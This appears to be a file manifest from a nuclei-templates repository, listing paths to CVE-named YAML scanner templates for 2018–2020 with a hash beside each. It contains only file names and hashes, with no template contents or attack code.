+nuclei-templates/cves/2018/CVE-2018-18775.yaml:cc37d6301a9b2bada17ea38f622bc6d61c936836 +nuclei-templates/cves/2018/CVE-2018-18777.yaml:92110822a997f0a63ab64309b93cdf8d38b0fa60 +nuclei-templates/cves/2018/CVE-2018-18778.yaml:4700fa407dab74ef9b57b432d7e23f7edcd4a85d +nuclei-templates/cves/2018/CVE-2018-18925.yaml:f15659b2847f1699847c5225ca8d24fe144bcb06 +nuclei-templates/cves/2018/CVE-2018-19136.yaml:303b7ad6f0699ab28a0f6595d90f0803bd81ac78 +nuclei-templates/cves/2018/CVE-2018-19137.yaml:7d7179870ec8e2d62fb7f54dd6c83a1f69e9909e +nuclei-templates/cves/2018/CVE-2018-19287.yaml:15c67a80b32c751e9eb68652c95b90c8bc6e1ccd +nuclei-templates/cves/2018/CVE-2018-19326.yaml:c6d031305177ac9399aa0b3bdf7d9ea5bb758e27 +nuclei-templates/cves/2018/CVE-2018-19365.yaml:fc39dbbf6ece63993dffd7d9ee0701d1a2e9f9f1 +nuclei-templates/cves/2018/CVE-2018-19386.yaml:6850b344c4ab0d6d57fce4090650905f958eb9e5 +nuclei-templates/cves/2018/CVE-2018-19439.yaml:5af05458b768fd5532b217feeb111b24ad832004 +nuclei-templates/cves/2018/CVE-2018-19458.yaml:38713983aee92f594455def148363f809ec475c9 +nuclei-templates/cves/2018/CVE-2018-19749.yaml:359003385eb7b06eb5095446754ff78f10ef4820 +nuclei-templates/cves/2018/CVE-2018-19751.yaml:7e97da628703c9ea619acd4d7664784508c85a16 +nuclei-templates/cves/2018/CVE-2018-19752.yaml:f0860aecfb6d6209a7be5d8b6f9ce64da4ff2d79 +nuclei-templates/cves/2018/CVE-2018-19753.yaml:3c5a521668913e0582b5f2b249224f1915546009 +nuclei-templates/cves/2018/CVE-2018-19877.yaml:84cab85256f892cd8edbb1d879a590e8848b8a0c +nuclei-templates/cves/2018/CVE-2018-19892.yaml:812ff246c4d8e993cef9fc971316aa12a9aced3d +nuclei-templates/cves/2018/CVE-2018-19914.yaml:49d3d914bd898fb928eefac426d27afe7248789a +nuclei-templates/cves/2018/CVE-2018-19915.yaml:245c6f16cd3369f44c9ebf9df11551e5e1ac6a39 +nuclei-templates/cves/2018/CVE-2018-20009.yaml:3250928f36012d34d9c91c2d350dfaabb449b183 +nuclei-templates/cves/2018/CVE-2018-20010.yaml:935731e57b6f70f3e0440ed03ed0a46659bda772 +nuclei-templates/cves/2018/CVE-2018-20011.yaml:440035b2e3e6ba01e5160ba058777c082cf05684 +nuclei-templates/cves/2018/CVE-2018-20462.yaml:c3baa7bb99c057460f3702c993c4b17e0491b7c3 +nuclei-templates/cves/2018/CVE-2018-20463.yaml:8322b0700b97565c287e5e8b2154b979359bc7e2 +nuclei-templates/cves/2018/CVE-2018-20470.yaml:ac025f7816834f209bcc94c520e78a16aec2ad82 +nuclei-templates/cves/2018/CVE-2018-20526.yaml:ed6962ad0c64425d8fffec3587d39315f68ea0d6 +nuclei-templates/cves/2018/CVE-2018-20824.yaml:7aa296dbe691b92b0ec92d6c2697797f9bfe03d4 +nuclei-templates/cves/2018/CVE-2018-20985.yaml:8c164d44391456565bedb5f70f5f2516d72b2511 +nuclei-templates/cves/2018/CVE-2018-2392.yaml:6d81cb8f3778447274dd80e10bedbf5260d2e8e3 +nuclei-templates/cves/2018/CVE-2018-2628.yaml:639a752db022c72d0c201866789de3cb569a0d66 +nuclei-templates/cves/2018/CVE-2018-2791.yaml:a4ad113c74197f4cab940a98d0f5497b151779f2 +nuclei-templates/cves/2018/CVE-2018-2893.yaml:a6599af7114c564e45ce233d35d1d4e3adc8074d +nuclei-templates/cves/2018/CVE-2018-2894.yaml:f6072077667bb7437850f3d7874e205b14e5ea24 +nuclei-templates/cves/2018/CVE-2018-3167.yaml:c847839f6c5418a30e08c9ebd571627547684be7 +nuclei-templates/cves/2018/CVE-2018-3238.yaml:0f67af570aee5b827b96e2903d73d5d931ba3822 +nuclei-templates/cves/2018/CVE-2018-3714.yaml:77db9a59ed3ddcda8a719ea8e105aad2d55e9fcf +nuclei-templates/cves/2018/CVE-2018-3760.yaml:0a134bfa5901c16f6fa79b2c57a091288ee1bf5b +nuclei-templates/cves/2018/CVE-2018-3810.yaml:ef0b3d15f82d2215b3261013abbdb3563c4fa971 +nuclei-templates/cves/2018/CVE-2018-5230.yaml:b6e03320d714a2def06a65e4fbe210350818914c +nuclei-templates/cves/2018/CVE-2018-5233.yaml:a426b39f0ec4047f5f4e5edf548abc1a108d98b0 +nuclei-templates/cves/2018/CVE-2018-5316.yaml:4ab6b0d354e06ce46242e14e46ef5bd148904993 +nuclei-templates/cves/2018/CVE-2018-5715.yaml:89528e269d3cc052e06aec859ff6acb22c93b6aa +nuclei-templates/cves/2018/CVE-2018-6008.yaml:e670ef81548aedb363c389bef279b0af5db52747 +nuclei-templates/cves/2018/CVE-2018-6200.yaml:c9f7b69d996686dcdd48f39f059e3a775d6d5781 +nuclei-templates/cves/2018/CVE-2018-6910.yaml:68896ff92eeedbd3f359785759bde28239cc9d97 +nuclei-templates/cves/2018/CVE-2018-7251.yaml:74f1d69513122b955a5fc96adcb04324ea9627f9 +nuclei-templates/cves/2018/CVE-2018-7422.yaml:beed7bc0c41fffcdcb8eed1c03892534afaf26a6 +nuclei-templates/cves/2018/CVE-2018-7467.yaml:b5125c37c6979b7cacbd55945d630e494354c3c2 +nuclei-templates/cves/2018/CVE-2018-7490.yaml:90d3a4873b8e42c021896b7177ca9e5acdb6d8aa +nuclei-templates/cves/2018/CVE-2018-7600.yaml:131d4295cf429c18f61801f4ce72140ce57e6ce8 +nuclei-templates/cves/2018/CVE-2018-7602.yaml:95ed7d2c9063ef4d6dbfd4359180b110016398bc +nuclei-templates/cves/2018/CVE-2018-7662.yaml:82d0feea71e223744af58de2ad08a359661e42e6 +nuclei-templates/cves/2018/CVE-2018-7700.yaml:796a0877bec9552b1ef784e415cdb48ecbfbe615 +nuclei-templates/cves/2018/CVE-2018-7719.yaml:1d395d904ceba9c66e3e97ef2806fbc6e0d90e6a +nuclei-templates/cves/2018/CVE-2018-8006.yaml:16e8c41268ac664d976fa928c69add9637c2501c +nuclei-templates/cves/2018/CVE-2018-8033.yaml:1077250f3ab9c5c856ff7026d69a8118c344ae60 +nuclei-templates/cves/2018/CVE-2018-8715.yaml:9c6999b4e02643c544673e6c4adbff33bdabfaa6 +nuclei-templates/cves/2018/CVE-2018-8719.yaml:edb2a887f02e6284fb8df3d2fab096b20569f3d3 +nuclei-templates/cves/2018/CVE-2018-8727.yaml:dfc5fb4adcd72c68fc9761ef14c77b23f3e4b57f +nuclei-templates/cves/2018/CVE-2018-8770.yaml:1d2b2ab7996c37fbad7f512fcc731bad026f961d +nuclei-templates/cves/2018/CVE-2018-9118.yaml:82918d4bf21b4dc3bff7972f2c50912b9263549f +nuclei-templates/cves/2018/CVE-2018-9161.yaml:6dfa517342157294a0c013f9087a0620e4baeeca +nuclei-templates/cves/2018/CVE-2018-9205.yaml:82d9ca3245afa3174e85050caacfb6612be3a357 +nuclei-templates/cves/2018/CVE-2018-9845.yaml:da9fb2db8a1d9d6044cf14c14a382bdd856daee9 +nuclei-templates/cves/2018/CVE-2018-9995.yaml:56f037744c80c4cd3d533c91f9e439dae2df46ee +nuclei-templates/cves/2019/CVE-2019-0193.yaml:ecf0eec203e55587ae7cf91aae76944b4cf8bcfa +nuclei-templates/cves/2019/CVE-2019-0221.yaml:3e66bf91b515db6de2e42644d1f860d0d60e18c5 +nuclei-templates/cves/2019/CVE-2019-0230.yaml:927858e660f119a2322f4149b9ef96fcb1ad8ab6 +nuclei-templates/cves/2019/CVE-2019-10068.yaml:165e95e7fc57d37908e3866c11265dbbdbe67c7d +nuclei-templates/cves/2019/CVE-2019-10092.yaml:f6ed2d0cc6a4a01e09c5387c280be4b685f91753 +nuclei-templates/cves/2019/CVE-2019-1010287.yaml:cb8a78655625f8968cd0251f0e62cd2ad1181dd1 +nuclei-templates/cves/2019/CVE-2019-1010290.yaml:e8d207b0d467f86e9bf1602aef3ca30b13a5a3df +nuclei-templates/cves/2019/CVE-2019-10232.yaml:8936f0feebb81886d80019d65d75450bcad36a27 +nuclei-templates/cves/2019/CVE-2019-10405.yaml:80e01b295674187c101f8a6f42b96b24a0ed6d3c +nuclei-templates/cves/2019/CVE-2019-10475.yaml:3ae7d0c42d4ddd93526c9037561c4bb0d84fc8d3 +nuclei-templates/cves/2019/CVE-2019-10692.yaml:d81fb65389146385b4bc110393c6977b89c25f9e +nuclei-templates/cves/2019/CVE-2019-10717.yaml:455292a3bc0eeea3bb42d7074cf9b4a4472cd98b +nuclei-templates/cves/2019/CVE-2019-10758.yaml:aed0626c8582be243a3563f7610c6d46db9e2a5c +nuclei-templates/cves/2019/CVE-2019-11013.yaml:f0c47b1799a5add9a13e40365f09e8b02f30d10c +nuclei-templates/cves/2019/CVE-2019-11248.yaml:61acbb60e9ba2d954fe94c2984a6c465e9b1582a +nuclei-templates/cves/2019/CVE-2019-11370.yaml:edac7e47962f5f02c552b1bfa3504ab24bf575da +nuclei-templates/cves/2019/CVE-2019-11510.yaml:4c8e3a3f17482fc7a32b07ab48902b351be23a61 +nuclei-templates/cves/2019/CVE-2019-11580.yaml:746422c9173a263656bab340b9e950b73da16c5b +nuclei-templates/cves/2019/CVE-2019-11581.yaml:fe83fe3ac2abe9dbf7bc623b2368367b9faad7be +nuclei-templates/cves/2019/CVE-2019-11869.yaml:c9987cd9a41d2fd54e0f5778f4a159f37be1197b +nuclei-templates/cves/2019/CVE-2019-12276.yaml:1be1a5fd6fac25afa4989ab46fd42070d6eec492 +nuclei-templates/cves/2019/CVE-2019-12314.yaml:ae48c1b1872b017cdbcf8b2035c122e450c1bbf6 +nuclei-templates/cves/2019/CVE-2019-12461.yaml:ef53f7cedc91ba5af9303597c62efa2db487b36e +nuclei-templates/cves/2019/CVE-2019-12581.yaml:a5c43fd1ea359b1cdd8540250a811d733a44a217 +nuclei-templates/cves/2019/CVE-2019-12583.yaml:cb0c589d0858f3f37c7b7b2c64362c330ef5795a +nuclei-templates/cves/2019/CVE-2019-12593.yaml:40cebe85a78b29e1ff853e60ad4f9ea6df74280f +nuclei-templates/cves/2019/CVE-2019-12616.yaml:91ec3f152db6a783ff01a69a7320f9e855f57db3 +nuclei-templates/cves/2019/CVE-2019-12725.yaml:32ffbad48569795c2e757da84fa7fa0de2da82e5 +nuclei-templates/cves/2019/CVE-2019-12962.yaml:f7a66a130d3327488bab5eec6641d1eb63976530 +nuclei-templates/cves/2019/CVE-2019-13101.yaml:fa023cc72d05972f584b468a9412b25e20b20fe5 +nuclei-templates/cves/2019/CVE-2019-13392.yaml:867d6130a6d5cdc1911437a2fee1dd6a53ec0215 +nuclei-templates/cves/2019/CVE-2019-13396.yaml:a45200d589cc91f29385eb74a69d782e2311dd05 +nuclei-templates/cves/2019/CVE-2019-13462.yaml:34ef5cd7257959c344aef75ead2e1e49289900da +nuclei-templates/cves/2019/CVE-2019-14205.yaml:26e62c2a4c978f68d2044978ae8993ffe7388ea5 +nuclei-templates/cves/2019/CVE-2019-14223.yaml:da04c051220f60fe8c5fa8ef09c910b4348f8ae5 +nuclei-templates/cves/2019/CVE-2019-14251.yaml:e0820239e801d9128b3df1d47b9a69dc57d83831 +nuclei-templates/cves/2019/CVE-2019-14312.yaml:7b0fd863f1108d79ffd7ff77115168c8e19f56c9 +nuclei-templates/cves/2019/CVE-2019-14322.yaml:b119b1fa9f5d8e5849edcd7d624389b2957e22ff +nuclei-templates/cves/2019/CVE-2019-14470.yaml:86e234ab931ff34acf6a311700cb6f3009808bcb +nuclei-templates/cves/2019/CVE-2019-14530.yaml:5d0c35c52a59450f3ca83305012b906c95e91205 +nuclei-templates/cves/2019/CVE-2019-14696.yaml:a4745fc9f6cd271f1ccd07cff849de968a84a2ce +nuclei-templates/cves/2019/CVE-2019-14974.yaml:74821009562fad71d00dfca86bae3e2be5bac220 +nuclei-templates/cves/2019/CVE-2019-15107.yaml:058d784aba93b46dadf336c5a40045e49d32fd8c +nuclei-templates/cves/2019/CVE-2019-15501.yaml:9817b1e1f5ed79cfdf35b8e5149aecaf731e909c +nuclei-templates/cves/2019/CVE-2019-15713.yaml:342530fd4c73b60a7d97d29a96e514b7e5a43cfd +nuclei-templates/cves/2019/CVE-2019-15811.yaml:4cd33f1795822b85199163c3cd1a315a0a5ca34c +nuclei-templates/cves/2019/CVE-2019-15858.yaml:43b7ddf2bb77952773463321048cb5a0185d0d96 +nuclei-templates/cves/2019/CVE-2019-15859.yaml:538e76af4b7e2cd8292c31e5f6744631d17a5db6 +nuclei-templates/cves/2019/CVE-2019-15889.yaml:0254b13322cf0d7167c896b537165abcfcad6442 +nuclei-templates/cves/2019/CVE-2019-16097.yaml:b21b7762d0fed0ebee925ae21c94bc89fbb4993f +nuclei-templates/cves/2019/CVE-2019-16123.yaml:9869ef4bc6a6b6dc85ba45650837c15851f2f6ec +nuclei-templates/cves/2019/CVE-2019-16278.yaml:10596bd950090537e90c6413a38ec01edb746bfa +nuclei-templates/cves/2019/CVE-2019-16313.yaml:2167e5dd4920d17ceb312c80045c6cadb2959770 +nuclei-templates/cves/2019/CVE-2019-16332.yaml:7bbb72fe4d45445c21679193edc3b6fd2e87d386 +nuclei-templates/cves/2019/CVE-2019-16525.yaml:33076c1f1296722db29a4cfffaac450b6d9ae725 +nuclei-templates/cves/2019/CVE-2019-1653.yaml:382311ee5af58205641fbd6c925beda33ad603c9 +nuclei-templates/cves/2019/CVE-2019-16662.yaml:abce00596164571992658a96418d712e43902089 +nuclei-templates/cves/2019/CVE-2019-16759.yaml:b405cb12bb335577d2f34224f74b8f153625a6f6 +nuclei-templates/cves/2019/CVE-2019-16920.yaml:3945088cc22cd3a01473557fd3ea829341c7f11a +nuclei-templates/cves/2019/CVE-2019-16931.yaml:b94cc8727122c729105a1f5cc132ef997bcc0444 +nuclei-templates/cves/2019/CVE-2019-16932.yaml:3dabe4eb6fa7929d25ed75465dfbbab0bcf2cc68 +nuclei-templates/cves/2019/CVE-2019-16996.yaml:0b733f974377c36bdd2ba1e04f1cd7b30c45f661 +nuclei-templates/cves/2019/CVE-2019-16997.yaml:cfdb3638d46f88761785a9adc4f3f8cd961f9095 +nuclei-templates/cves/2019/CVE-2019-17270.yaml:c967bbc154034e71efa5b121a4cc256b222efe89 +nuclei-templates/cves/2019/CVE-2019-17382.yaml:40a94d4836802b2d88ae1756016eb3d310caf0fe +nuclei-templates/cves/2019/CVE-2019-17418.yaml:108edda7537f06f6d35b321c859e29c8eeb74dbc +nuclei-templates/cves/2019/CVE-2019-17444.yaml:f4ebaaec8510d70e0834f73a26bc77eeb68cf99b +nuclei-templates/cves/2019/CVE-2019-17503.yaml:546b786de0c127f3f8c6b8f47d91521758aac730 +nuclei-templates/cves/2019/CVE-2019-17506.yaml:696d69f9847815eef99c8d44570bf3016d17154e +nuclei-templates/cves/2019/CVE-2019-17538.yaml:42296cac1aaea55475cbc52a366d97234741c39e +nuclei-templates/cves/2019/CVE-2019-17558.yaml:c8a74d61f926ec88baa2815bb794a4013f2f019e +nuclei-templates/cves/2019/CVE-2019-1821.yaml:355a4ebef75af9686ad39f5214a95d6a1a978824 +nuclei-templates/cves/2019/CVE-2019-18371.yaml:5223aea98a97a78d6e376f40b4d4074307bac36b +nuclei-templates/cves/2019/CVE-2019-18393.yaml:22bd0db3d8e360549e09d646ed28c4b091191593 +nuclei-templates/cves/2019/CVE-2019-18394.yaml:2b18f1749571509d8fa8d52da9b6614ab0ddb9ce +nuclei-templates/cves/2019/CVE-2019-18665.yaml:7ceb3a31de05c3b32af60a1c19cdfecfc61a3539 +nuclei-templates/cves/2019/CVE-2019-18818.yaml:1d192a44938d6c5902269d23f57b28b7690f6754 +nuclei-templates/cves/2019/CVE-2019-18922.yaml:29137fa6e788a4d6f069aeba9d48c7fb687b4108 +nuclei-templates/cves/2019/CVE-2019-18957.yaml:73c42debac03cd0b991bbbcb48320902aa6ab017 +nuclei-templates/cves/2019/CVE-2019-19134.yaml:54c55ff27fced7c252670f9a54ec84602656b867 +nuclei-templates/cves/2019/CVE-2019-19368.yaml:2247e9c3ce6241c31c45728ab58ab058620d60bd +nuclei-templates/cves/2019/CVE-2019-19781.yaml:ced0610e2a3994aff34d540727566eb06a35bca7 +nuclei-templates/cves/2019/CVE-2019-19824.yaml:97a362fc704628b9d1158758ffead2a6ecabd9e7 +nuclei-templates/cves/2019/CVE-2019-19908.yaml:74b4c7df1e5d80369904f359761c671514c2e457 +nuclei-templates/cves/2019/CVE-2019-19985.yaml:2d2a9cfb592aa0a90b5b80638342d217a6252d57 +nuclei-templates/cves/2019/CVE-2019-20085.yaml:0478be3588f9caa27fc633f8b2b751b6a89d8fde +nuclei-templates/cves/2019/CVE-2019-20141.yaml:022a08bcae5f66feaab7822458dc66f3b7e6f01c +nuclei-templates/cves/2019/CVE-2019-20183.yaml:e7f61b176e57e5e82a30939a0c9bbd894eb9c360 +nuclei-templates/cves/2019/CVE-2019-20210.yaml:d3b4e306eb83a2a122c37f535ac82000d2af4617 +nuclei-templates/cves/2019/CVE-2019-20224.yaml:1aa63a1c548410a5b65810bdd17ec840f16e7c60 +nuclei-templates/cves/2019/CVE-2019-20933.yaml:0a8bf3720e7114986a1e8063bc17039d1f577315 +nuclei-templates/cves/2019/CVE-2019-2578.yaml:21b1c6efc53bc5b7e6643c5a15654a2a2770d9ee +nuclei-templates/cves/2019/CVE-2019-2579.yaml:b1697c44ea1ad24a64bd912c9923065e437aa9ec +nuclei-templates/cves/2019/CVE-2019-2588.yaml:e8014b22b9bfa8450d05c64305c12953b3c623a3 +nuclei-templates/cves/2019/CVE-2019-2616.yaml:2384ce74777a21a82869d25c833bd8389cb5b121 +nuclei-templates/cves/2019/CVE-2019-2725.yaml:555c282ab65ea05444662b9ea2cc2525c9e34752 +nuclei-templates/cves/2019/CVE-2019-2729.yaml:d82bd545734f241edc493c40a5fcd34b3afaf00a +nuclei-templates/cves/2019/CVE-2019-2767.yaml:7727beb4701347fa1217b2e41421e8c28346d5cf +nuclei-templates/cves/2019/CVE-2019-3396.yaml:e9c8da6199e78f58921711ed3363714870f8a13f +nuclei-templates/cves/2019/CVE-2019-3401.yaml:87efcd9734745e982fd79037fd1f7d10e2c2f0b2 +nuclei-templates/cves/2019/CVE-2019-3402.yaml:4d5666e1e71c182738e0d5c21dabbbe9f9406cde +nuclei-templates/cves/2019/CVE-2019-3403.yaml:2c843019ffb7d55778d7327161bc01f7e97c8bd8 +nuclei-templates/cves/2019/CVE-2019-3799.yaml:07c0ef2421aa42f5248377c0e511eb8945e31a57 +nuclei-templates/cves/2019/CVE-2019-3911.yaml:9510424432c963aabb5d28d32c08f32d3dcac93a +nuclei-templates/cves/2019/CVE-2019-3912.yaml:dd969a5f51970c9eedcfb059ec2dc6abdbf656e2 +nuclei-templates/cves/2019/CVE-2019-3929.yaml:bdcaa622b23904ae7c18b59022ef10022009cb5c +nuclei-templates/cves/2019/CVE-2019-5127.yaml:0ed4a8b23cb39858380de041679085fcb8aef171 +nuclei-templates/cves/2019/CVE-2019-5418.yaml:8d5ab4dc3a64a9cb2465352f57c54d5c2afdc82b +nuclei-templates/cves/2019/CVE-2019-6112.yaml:c1a249cd438b0e1ed32073b1a2bc464ca4b2460a +nuclei-templates/cves/2019/CVE-2019-6340.yaml:dcc3e3751cb7f4b40b2e17e84d5e0e814e0ea749 +nuclei-templates/cves/2019/CVE-2019-6715.yaml:c9d9c67f9cce11637ae0660b15d1043c40e687a2 +nuclei-templates/cves/2019/CVE-2019-7219.yaml:4284095f982d0d6dd0ae52afb6dd62c0efc6eb65 +nuclei-templates/cves/2019/CVE-2019-7238.yaml:ca3c9a474d4920cb3d84eeb9c325e9fc2af46806 +nuclei-templates/cves/2019/CVE-2019-7254.yaml:7098381f2f71b46241469e2cb78500f56ffede3f +nuclei-templates/cves/2019/CVE-2019-7255.yaml:a681f64fb5e581d4424dfb2f07143b6769e920d5 +nuclei-templates/cves/2019/CVE-2019-7256.yaml:e906c720b6c8040b49577b0f0d4be9b994750c9f +nuclei-templates/cves/2019/CVE-2019-7275.yaml:e40eef628a72554206ed4e5598807c2cac640eb7 +nuclei-templates/cves/2019/CVE-2019-7315.yaml:aa8e37c308c9ef42a54a02f90608f896780d1a13 +nuclei-templates/cves/2019/CVE-2019-7481.yaml:deb05870612352f402cde3193eaf08f1bb680ee4 +nuclei-templates/cves/2019/CVE-2019-7543.yaml:e1e79a811051431e753d85d5453e7b077c0d486f +nuclei-templates/cves/2019/CVE-2019-7609.yaml:45d630d0c78733dc57e4d2e4d3c185bf7f7e3c39 +nuclei-templates/cves/2019/CVE-2019-8086.yaml:db69c57bbf05bd00bcb699225ccbe4b024eea27e +nuclei-templates/cves/2019/CVE-2019-8442.yaml:8da062f7c2d0968f1672ac968bd7b01b1c4d2885 +nuclei-templates/cves/2019/CVE-2019-8446.yaml:17f3c1f979ba562e50519d1055414aa78720a6b6 +nuclei-templates/cves/2019/CVE-2019-8449.yaml:6df1cb961914d26a5008654c472b4c95126bc641 +nuclei-templates/cves/2019/CVE-2019-8451.yaml:f5879088631df35752b9dc57f571a55e8ce930db +nuclei-templates/cves/2019/CVE-2019-8903.yaml:db7e0f3df098639465a668a6885c264f45e59f24 +nuclei-templates/cves/2019/CVE-2019-8937.yaml:c2e9c01caaeb838a1e45d6b76b7d6654855beeab +nuclei-templates/cves/2019/CVE-2019-8982.yaml:6f7c5623b56bfd0d39d5e5d5961dd98fabbd6c64 +nuclei-templates/cves/2019/CVE-2019-9041.yaml:268501e1943b58c53701d809a62558a4302f78b0 +nuclei-templates/cves/2019/CVE-2019-9618.yaml:8701e944a85c57ac17a3e4b60d536bf2c310475e +nuclei-templates/cves/2019/CVE-2019-9670.yaml:b18172d213611aa0596d68fa7fa38f2f8d6aa8a8 +nuclei-templates/cves/2019/CVE-2019-9726.yaml:7b489dbf29def8f75686f7b111850c04b59d3390 +nuclei-templates/cves/2019/CVE-2019-9733.yaml:6eb004a5a1496d3bc7676222cc25ce8a2fea161f +nuclei-templates/cves/2019/CVE-2019-9915.yaml:85cc38e73c7b70b0efe7c4941d1ca50dc8fa659a +nuclei-templates/cves/2019/CVE-2019-9922.yaml:b8d18e303a3a3254e77851d33fe6c1239718a036 +nuclei-templates/cves/2019/CVE-2019-9955.yaml:92b8cfbbdfd0468d83e21acec40f1bc7c0eca536 +nuclei-templates/cves/2019/CVE-2019-9978.yaml:d09e8b2ae06f618871884c8e73fbaa1533d97c58 +nuclei-templates/cves/2020/CVE-2020-0618.yaml:91b452b40567bfe3235a19ed2f6bc712a9c7ea56 +nuclei-templates/cves/2020/CVE-2020-10148.yaml:0dd153c4bec812286451f03a69938a4b4d14de8f +nuclei-templates/cves/2020/CVE-2020-10546.yaml:998fcd9811a073e508195e3ad34f740d4bb642b1 +nuclei-templates/cves/2020/CVE-2020-10547.yaml:46b8adfd6983e325ec8569a8ed4e85d8429c4aa2 +nuclei-templates/cves/2020/CVE-2020-10548.yaml:d82e3d5e4047688ac450ac83735e8b9c6c20ae99 +nuclei-templates/cves/2020/CVE-2020-10549.yaml:20325064dc7ca18992e977a04be851b653e94934 +nuclei-templates/cves/2020/CVE-2020-10770.yaml:9d0ba171df50c1fcb4f1b55b51f9c95a0351ba86 +nuclei-templates/cves/2020/CVE-2020-10973.yaml:4a50461da0735b04a44af1b963bb82130f67d109 +nuclei-templates/cves/2020/CVE-2020-11034.yaml:fa68437d117dcffe9b15c63f7e109f95807c42e2 +nuclei-templates/cves/2020/CVE-2020-11110.yaml:f8ad948cbe4e782a144af7ca81ad716e82e900f0 +nuclei-templates/cves/2020/CVE-2020-11450.yaml:f69df1874742db24f914ec189f564635546658b8 +nuclei-templates/cves/2020/CVE-2020-11455.yaml:00e146aef4e99e462159f4695339384eb9f7d0ad +nuclei-templates/cves/2020/CVE-2020-11529.yaml:383c9317a0a61d9a2c135d052d6d2e099b7d85fe +nuclei-templates/cves/2020/CVE-2020-11546.yaml:2f0b22e6e73fbd663587b310c82da24034d3a7c2 +nuclei-templates/cves/2020/CVE-2020-11547.yaml:f2d247c1f90c2fa835e682c89c6b334b49937fe8 +nuclei-templates/cves/2020/CVE-2020-11710.yaml:3a22b14797fc1bb3a2575f43055d7241aa4312e6 +nuclei-templates/cves/2020/CVE-2020-11738.yaml:cf2ee1a12ef49bc80739adf4d4ed9baeda6857a8 +nuclei-templates/cves/2020/CVE-2020-11853.yaml:9dc487771a6a88ae2fc0d15876419ccd635c0bf5 +nuclei-templates/cves/2020/CVE-2020-11854.yaml:431f9d6235b9343c803b9dc300f5a334d741a6e2 +nuclei-templates/cves/2020/CVE-2020-11930.yaml:aa9e5280c9783cc7d0df18c5b1d24e5878749236 +nuclei-templates/cves/2020/CVE-2020-11978.yaml:14207692cf374fcaf6280799ca189360819938fd +nuclei-templates/cves/2020/CVE-2020-11991.yaml:72bd562af23e4db13267bd3f992eb0110f6f444f +nuclei-templates/cves/2020/CVE-2020-12054.yaml:ed0d82d53c0d6374581dcf4a14905fbeff676195 +nuclei-templates/cves/2020/CVE-2020-12116.yaml:2aa5d893d7f687e7e0a2ea196bbdb2d95abbcfc1 +nuclei-templates/cves/2020/CVE-2020-12127.yaml:3388768390c1f72d8eaf0093a06ce5addecfc29c +nuclei-templates/cves/2020/CVE-2020-12447.yaml:80ad1b76d191434c38df6e3e95d14e0c32a1bd8f +nuclei-templates/cves/2020/CVE-2020-12478.yaml:91a2841f5294612c9d1a0b0d149e151704e85346 +nuclei-templates/cves/2020/CVE-2020-12720.yaml:be2e1698b7164a8431e3955b04dc99a34c02bc00 +nuclei-templates/cves/2020/CVE-2020-12800.yaml:b4d460fd9805446c9d48c0f31af03a036fffbbd9 +nuclei-templates/cves/2020/CVE-2020-13117.yaml:9fcb109d7f498ba87bb70566b805f7d6905a09d7 +nuclei-templates/cves/2020/CVE-2020-13121.yaml:ec734b83eaae0e040b99e50f1c755f86b1529a2a +nuclei-templates/cves/2020/CVE-2020-13158.yaml:45ee5575cd6710040c322caf20c995d71bc972f0 +nuclei-templates/cves/2020/CVE-2020-13167.yaml:042fcd95b4c9ec02c4e3f3a33c00046877967b47 +nuclei-templates/cves/2020/CVE-2020-13258.yaml:c95d11d8dd458acfac4fcddbcd1f09926dd461d0 +nuclei-templates/cves/2020/CVE-2020-13405.yaml:4b6be88456409e0ba5815950b3c1256d77fb3847 +nuclei-templates/cves/2020/CVE-2020-13483.yaml:75f4b6444d13a9871d447b2800526746dde9fad0 +nuclei-templates/cves/2020/CVE-2020-13700.yaml:14a73bdc564db313b195a4c49c212ac8a8ba4126 +nuclei-templates/cves/2020/CVE-2020-13820.yaml:5284a6a8844df97d060a6ecf0c72907677997209 +nuclei-templates/cves/2020/CVE-2020-13927.yaml:91210fdb8734afd9891a845813192b8ec89cf2a6 +nuclei-templates/cves/2020/CVE-2020-13937.yaml:0d7330571c9f62889615d63a77d91b5b4fd10f44 +nuclei-templates/cves/2020/CVE-2020-13942.yaml:df29fc8a7cd31b17dc771a980409ed136d91bd1f +nuclei-templates/cves/2020/CVE-2020-13945.yaml:148b66b83f6762f929b015ab02e21d1f0b67105b +nuclei-templates/cves/2020/CVE-2020-14092.yaml:3d4a76f3c5dbbb00227c924fbc7c8daff46625ae +nuclei-templates/cves/2020/CVE-2020-14179.yaml:ba967e2b85db5a8aec715b52c987beae88776e85 +nuclei-templates/cves/2020/CVE-2020-14181.yaml:06be9efb04e59cd06906a6a31f77257d9fa24870 +nuclei-templates/cves/2020/CVE-2020-14408.yaml:4add63e37bc3f9b75de4da8d2dd49a9dfddce46a +nuclei-templates/cves/2020/CVE-2020-14413.yaml:cef348318919098aac6760d96d0bc45b850fc7b2 +nuclei-templates/cves/2020/CVE-2020-14750.yaml:5b32bca9de2d7f6d54701bc69c5d70ae35229123 +nuclei-templates/cves/2020/CVE-2020-14864.yaml:c37bde7c4e0e540dd2d8623a76e281a98124930b +nuclei-templates/cves/2020/CVE-2020-14882.yaml:bfe85c9273144f3e4b8709a26f42be2245354236 +nuclei-templates/cves/2020/CVE-2020-14883.yaml:e38af5a48c9264798d8f0a46e1a489452d9aac2a +nuclei-templates/cves/2020/CVE-2020-15050.yaml:c673f4ae35a364c4e79d314a1a8623f3b12265bb +nuclei-templates/cves/2020/CVE-2020-15129.yaml:5e4749c006bc6b13a7cb9e09ad6cd74063f7224e +nuclei-templates/cves/2020/CVE-2020-15148.yaml:cc5a169a75f0adddbcdeae3270b84e2e8bed11a5 +nuclei-templates/cves/2020/CVE-2020-15227.yaml:1ade832040f52a29592181ad9a489c90374d2c1b +nuclei-templates/cves/2020/CVE-2020-15500.yaml:16fa9601d89aee902092a204e501a7e591640762 +nuclei-templates/cves/2020/CVE-2020-15505.yaml:83093349313bb44e0e094f6d853f4daf78195684 +nuclei-templates/cves/2020/CVE-2020-15568.yaml:aa709243c057780014062ffecd71a39cf7ebb50d +nuclei-templates/cves/2020/CVE-2020-15920.yaml:5577d23b313449a3a56787d3ebaff9f252cb64a9 +nuclei-templates/cves/2020/CVE-2020-16139.yaml:da91a1e80deae256adfd7ca82eacf78a7bbf680c +nuclei-templates/cves/2020/CVE-2020-16846.yaml:2e25722b1c2cfa91a490f6566e7ef8f3cce9734a +nuclei-templates/cves/2020/CVE-2020-16952.yaml:130f291e176321004192ceb0a476ccdffea29123 +nuclei-templates/cves/2020/CVE-2020-17362.yaml:ea70b8e400f632550c757de1d4fefa0c2c504205 +nuclei-templates/cves/2020/CVE-2020-17453.yaml:4e0faf594777a63dfb01c6602a849eb61e33db43 